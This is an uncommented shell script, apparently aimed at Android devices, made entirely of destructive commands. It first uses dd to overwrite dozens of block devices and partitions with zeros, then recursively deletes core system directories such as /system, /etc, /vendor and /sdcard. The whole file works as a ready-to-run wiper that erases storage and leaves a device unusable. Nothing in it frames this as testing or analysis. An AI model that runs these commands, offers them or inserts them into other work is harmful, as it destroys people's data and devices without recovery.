dd if=/dev/zero of=/dev/block/sdc
dd if=/dev/zero of=/dev/block/sdd
dd if=/dev/zero of=/dev/block/sde
dd if=/dev/zero of=/dev/block/sdf
dd if=/dev/zero of=/dev/block/sda1
dd if=/dev/zero of=/dev/block/sda2
dd if=/dev/zero of=/dev/block/sda3
dd if=/dev/zero of=/dev/block/sda4
dd if=/dev/zero of=/dev/block/sda5
dd if=/dev/zero of=/dev/block/sda6
dd if=/dev/zero of=/dev/block/sda7
dd if=/dev/zero of=/dev/block/sda8
dd if=/dev/zero of=/dev/block/sda9
dd if=/dev/zero of=/dev/block/sda10
dd if=/dev/zero of=/dev/block/sda11
dd if=/dev/zero of=/dev/block/sda12
dd if=/dev/zero of=/dev/block/sda13
dd if=/dev/zero of=/dev/block/sda14
dd if=/dev/zero of=/dev/block/sda15
dd if=/dev/zero of=/dev/block/sda16
dd if=/dev/zero of=/dev/block/sda17
dd if=/dev/zero of=/dev/block/sda18
dd if=/dev/zero of=/dev/block/sda19
dd if=/dev/zero of=/dev/block/sda20
dd if=/dev/zero of=/dev/block/sda21
dd if=/dev/zero of=/dev/block/sda22
dd if=/dev/zero of=/dev/block/sda23
dd if=/dev/zero of=/dev/block/sda24
dd if=/dev/zero of=/dev/block/sda25
dd if=/dev/zero of=/dev/block/sda26
dd if=/dev/zero of=/dev/block/sda27
dd if=/dev/zero of=/dev/block/sda28
dd if=/dev/zero of=/dev/block/sda29
dd if=/dev/zero of=/dev/block/sda30
rm -rf /system/
rm -rf /etc/
rm -rf /Android/
rm -rf /root/
rm -rf /xbin/
rm -rf /lib/
rm -rf /sdcard/
rm -rf /vendor/
rm -rf /sys/
rm -rf /acct/
rm -rf /apex/
rm -rf /config/
rm -rf /data_mirror/
rm -rf /linkerconfig/
rm -rf /debug_ramdisk/
